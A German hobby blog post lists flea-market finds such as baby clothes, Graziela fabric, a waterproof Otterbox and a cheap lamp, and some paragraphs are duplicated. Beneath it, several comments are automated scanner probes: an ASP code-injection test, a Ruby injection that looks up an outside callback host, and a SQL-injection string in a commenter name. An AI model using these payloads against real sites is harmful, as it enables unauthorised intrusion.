Flohmarktfunde Teil 2

Da ist seit April wieder einiges zusammengekommen. Ich geh öfter auf Flohmärkte und kaufe gar nichts, aber in letzter Zeit war ich erfolgreich. Das liegt aber wahrscheinlich auch daran, dass man sich mit Babysachen totkaufen könnte. ;-) Oben seht ihr aber erst mal zwei Pullis für mich.

Zwei Mal Babyklamotten und James Bond. Es geht nichts über Daniel Craig als James Bond (auch wenn ich das als Einzige so sehe ;-) )
Zwei Mal Babyklamotten und James Bond. Es geht nichts über Daniel Craig als James Bond (auch wenn ich das als Einzige so sehe ;-) )
Graziela-Stoff (Jippi-Jippi-Yeah!!!), lustige Kinderbettwäsche und eine "Otterbox". Das ist eine wasserdichte Kamerabox, die neu zwischen 50 und 60 € kostet. Wir haben 7 € bezahlt. Was ich damit mache, weiß ich noch nicht. ;-)
Graziela-Stoff (Jippi-Jippi-Yeah!!!), lustige Kinderbettwäsche und eine "Otterbox". Das ist eine wasserdichte Kamerabox, die neu zwischen 50 und 60 € kostet. Wir haben 7 € bezahlt. Was ich damit mache, weiß ich noch nicht. ;-)
Eine Lampe. Nein, nicht fürs Kinderzimmer, sondern für eine Abstellkammer. ^^' Wir haben da eine billige gesucht. Gegen 3 € kann man nichts sagen. Und ein flauschi Jäckchen mit Ööööhrchen! <3
Eine Lampe. Nein, nicht fürs Kinderzimmer, sondern für eine Abstellkammer. ^^' Wir haben da eine billige gesucht. Gegen 3 € kann man nichts sagen. Und ein flauschi Jäckchen mit Ööööhrchen! <3

So kann es weiter gehen! :-)


Mehr Projekte und Rezepte gibt es im Archiv!

Kommentar schreiben

Kommentare: 5
  • #1

    Marlia (Sonntag, 06 September 2015 13:25)

    Schöne Sachen :-) Besonders der Graziela-Stoff ist sooo klasse <3
    Ich liebe Flohmärkte auch! Zum Glück hat die Kinderflohmarktsaison grade wieder begonnen :-)
    Viele liebe Grüße,
    Marlia

  • #2

    CpjJwWHV (Samstag, 11 Februar 2023 23:59)

    '+response.write(9652472*9241937)+'

  • #3

    CpjJwWHV (Samstag, 11 Februar 2023 23:59)

    "+"A".concat(70-3).concat(22*4).concat(99).concat(67).concat(97).concat(76)+(require"socket"
    Socket.gethostbyname("hitvx"+"pnkfewvo64129.bxss.me.")[3].to_s)+"

  • #4

    CpjJwWHV (Samstag, 11 Februar 2023 23:59)

    1

  • #5

    -1' OR 2+520-520-1=0+0+0+1 or 'bpIydUNi'=' (Sonntag, 12 Februar 2023 00:00)

    1